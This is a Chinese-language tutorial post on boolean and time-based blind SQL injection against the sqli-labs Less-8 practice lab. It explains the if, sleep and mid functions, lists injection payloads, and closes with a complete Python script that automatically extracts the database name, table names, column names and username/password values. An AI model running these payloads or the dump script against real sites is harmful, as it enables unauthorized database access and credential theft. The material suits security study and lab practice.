【SQL注入】盲注_sql注入if函数

其他相关文章:

SQL注入基础

报错注入

盲注

用于页面注入无回显并且不会打印错误信息的情况.

盲注类型

布尔型盲注,延时盲注

布尔型盲注

注入页面虽然无回显,但是根据注入造成的不同布尔值(true与false)页面会有不同的结果这便是布尔型盲注.

if函数:if(condition, value_if_true, value_if_false),condition为判断条件,参数二与参数三分别为条件为true和false时将做出的反应.

sleep函数:sleep(duration),该函数作用是休眠,duration为休眠时长,单位为秒.

 mid函数:mid(str,pos,len),mid is a synonym for substring(str,pos,len).mid函数是substring函数的同义词,作用为截取字符串,从第二个参数开始截取,截取长度由第三个参数指定.

 延时盲注

和布尔型盲注差别没有特别大,布尔型盲注判断正误的依据是布尔值不同页面呈现的不同反应,延时盲注判断正误的依据则是页面响应的时间.

例题:sqlilabs Less-8

payload: 1'and '1'='1

 payload: 1' and '1'='2

可以看到,当布尔值为true(1=1)时,页面有You are in....字样,布尔值为false(1=2)时却没有.

为便于理解,先试着注入出数据库名.

爆数据库名

payload:1' and length(database())>'1

这是显而易见的true,数据库名自然是大于等于1的

payload: 1' and length(database())>'100

这是显而易见的false.

数据库名长度,大于7却不大于8,那自然就等于8.

很清楚,当出现You are in...字样时便意味着猜测正确.下面开始具体的爆数据库名.

payload:1' and mid(database(),1,1)='a

payload:1' and mid(database(),1,1)='s

 所以数据库第一个字母为s.

payload:1' and mid(database(),2,1)='e

 第二个字母为e.

手动进行注入,效率其实还挺低,所以我们可以写一个脚本来跑,如下

运行结果为:

爆表名与字段

这里采用if+sleep延时盲注的方法进行注入,如果要采用布尔型盲注,方法和上面是一样的,区别只在于payload的编写.

已知数据库名长度为8,我们用延时盲注来验证一下,以便于理解延时盲注.

payload:1' and if(length(database())=8,sleep(1),1) --+

执行后,页面不会有什么变化,但是我们可以明显感觉到页面响应时间变长了,用burpsuite可以看见响应时间为1002millis也即是1.002s,正常响应时间0.002s加上sleep的1s.所以可以明白,布尔型注入判断猜解是否正确的标准是响应页面的反应,而延时盲注判断猜解是否正确的标准则是时间.

 payload:1' and if(length(database())=9,sleep(1),1) --+

 可以看到响应时间为1millis也即是0.001s

利用这个特性来猜解表名.为提升效率,我还是写一个脚本,如下.

 运行结果如下:

 爆字段代码如下:

运行结果如下:

 爆字段值

运行结果如下 :

 整合一下,自动化后代码如下:

#-*- coding:utf-8 -*-
# Author:@4ut15m
# filename:blindi.py
import requests
 
url = "http://anicekid/sqlilabs/Less-8/"
codeset = "abcdefghijklmnopqrstuvwxyz+-*/_0123456789"+" " # 字符集
yes = "You are in"
 
 
def dump_database(url):
    database = ""
    print "正在猜解数据库名......"
    for i in range(1,9) :
        for x in codeset:
            payload = "1' and mid(database(),{a},1)='{b}".format(a=str(i),b=x)
            param = {"id":payload}
            res = requests.get(url=url,params=param)
            if yes in res.text:
                database += x 
                break
    print "数据库名为:"+database
    return database
 
    # Author:4ut15m
def dump_tables(url,database):
    # 先暴破表数
    tables_number = 0
    tables = ""
    print "正在猜解表数......"
    for i in range(1,20):
        payload = "?id=1' and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(0.1),1) --+".format(str(i))
        try:
            res = requests.get(url=url+payload, timeout=0.1)
        except requests.exceptions.ReadTimeout:
            tables_number = i
            break
    print "数据库"+database+"中共有"+str(tables_number)+"张表"
    
    # 依次猜解表名
    name_length = 0
    for i in range(tables_number):
        # 先判断表名长度
        for a in range(1,20):
            payload = "?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit {},1))={},sleep(0.1),1) --+".format(str(i),str(a))
            try:
                res = requests.get(url=url+payload, timeout=0.1)
            except requests.exceptions.ReadTimeout:
                name_length = a
                break
        print "第{}张表,表名长度为{}".format(str(i+1),str(name_length))
 
        # 开始猜解表名
        for b in range(1,name_length+1):
            for x in codeset:
                payload = "?id=1' and if(mid((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1)='{}',sleep(0.1),1) --+".format(str(i),str(b),x)
                try:
                    res = requests.get(url=url+payload, timeout=0.1)
                except requests.exceptions.ReadTimeout:
                    tables += x
        if i!=tables_number-1 :
            print "当前表有:"+tables
            tables +=","
        else :
            print "数据库"+database+"所有表为:"+tables
    return tables
 
    #Author:4ut15m
def dump_columns(url,tables):
    table = tables.split(',')
    # 先暴破字段数
    columns_number = 0
    columns = ""
    for i in range(1,20):
        payload = "?id=1' and if((select count(*) from information_schema.columns where table_schema=database() and table_name='{}')={},sleep(0.1),1) --+".format(table[0],str(i))
        try:
            res = requests.get(url=url+payload, timeout=0.1)
        except requests.exceptions.ReadTimeout:
            columns_number = i
            break
    print "{}表中共有{}个字段".format(table[0],str(columns_number))
 
    # 依次猜解字段名
    name_length = 0
    for i in range(columns_number):
        # 先判断字段名长度
        for a in range(1,20):
            payload = "?id=1' and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='{}' limit {},1))={},sleep(0.1),1) --+".format(table[0],str(i),str(a))
            try:
                res = requests.get(url=url+payload, timeout=0.1)
            except requests.exceptions.ReadTimeout:
                name_length = a
                break
        print "第{}个字段,字段名长度为{}".format(str(i+1),str(name_length))
 
        # 开始猜解表名
        for b in range(1,name_length+1):
            for x in codeset:
                payload = "?id=1' and if(mid((select column_name from information_schema.columns where table_schema=database() and table_name='{}' limit {},1),{},1)='{}',sleep(0.1),1) --+".format(table[0],str(i),str(b),x)
                try:
                    res = requests.get(url=url+payload, timeout=0.1)
                except requests.exceptions.ReadTimeout:
                    columns += x
        if i!=columns_number-1 :
            print "当前字段有:"+columns
            columns +=","
        else :
            print "users表中所有字段为:"+columns
    return columns
 
   # Author:4ut15m
def dump(url,columns):
    column = columns.split(',')
    # 先判断长度
    dump_length = 0
    dump = ""
    for i in range(200):
        payload = "?id=1' and if(length((select group_concat({},{}) from users))={},sleep(0.1),1) --+".format(column[1],column[2],str(i))
        try:
            res = requests.get(url=url+payload, timeout=0.1)
        except requests.exceptions.ReadTimeout:
            dump_length = i;
            break
    print "字段值长度为:"+str(dump_length)
 
    # dump值
    print "正在猜解,请等待...."
    for i in range(1,dump_length+1):
        for asci in range(33,128):
            payload = "?id=1' and if(ascii(mid((select group_concat({},{}) from users),{},1))={},sleep(0.1),1) --+".format(column[1],column[2],str(i),str(asci))
            try:
                res = requests.get(url=url+payload, timeout=0.1)
            except requests.exceptions.ReadTimeout:
                if chr(asci) != ',':
                    dump += chr(asci)
                else :
                    dump += "\n"
                break
    print "users表中username,password 字段值为:\n"+dump
 
 
database = dump_database(url)
tables = dump_tables(url,database)
columns = dump_columns(url,tables)
dump(url,columns)

运行结果如下:

 emmmm..以后会考虑写一个普适性强一点的脚本.